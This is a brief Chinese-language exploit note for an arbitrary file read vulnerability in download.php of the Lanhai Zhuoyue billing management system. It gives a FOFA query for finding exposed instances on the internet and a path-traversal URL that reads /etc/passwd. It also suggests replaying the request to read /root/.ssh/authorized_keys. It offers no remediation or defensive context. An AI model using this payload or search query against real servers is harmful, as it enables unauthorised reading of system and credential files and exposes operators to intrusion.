蓝海卓越计费管理系统任意文件读取

漏洞名称：
蓝海卓越计费管理系统 download.php 任意文件读取漏洞

描述：
攻击者通过 ../ 遍历目录可以读取服务器上的敏感文件

影响版本：
蓝海卓越计费管理系统

fofa：
title==“蓝海卓越计费管理系统”

查看/etc/passwd

http://xx.xx.xx.xx/download.php?file=../../../../../etc/passwd

数据包重放，查看/root/.ssh/authorized_keys